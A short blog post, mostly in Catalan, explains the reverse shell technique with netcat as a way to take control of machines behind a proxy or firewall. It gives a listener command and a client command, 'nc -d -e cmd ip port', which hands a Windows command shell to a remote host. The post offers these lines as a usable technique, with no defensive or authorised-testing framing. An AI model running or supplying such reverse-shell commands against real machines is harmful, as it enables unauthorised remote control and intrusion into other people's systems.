Get it on Google Play
Tu partner Freelance para tus proyectos IT

Reverse Shell amb netcat

03-01-2008

El Reverse Shell es una tècnica que consisteix en fer que un client faci una crida a un servidor perquè el servidor prengui el control del client. Es molt últil a l’hora de prendre el control de màquines, les quals, no disposen de una IP pública on fer peticions (Per exemple: perquè estan darrera un proxy, perquè tenen un firewall, etc.)

# Comanda del servidor
nc -vv -l -p 6000

# Comanda del client
nc -d -e cmd ip port

Si te ha servido, por favor comparte

Leave a Reply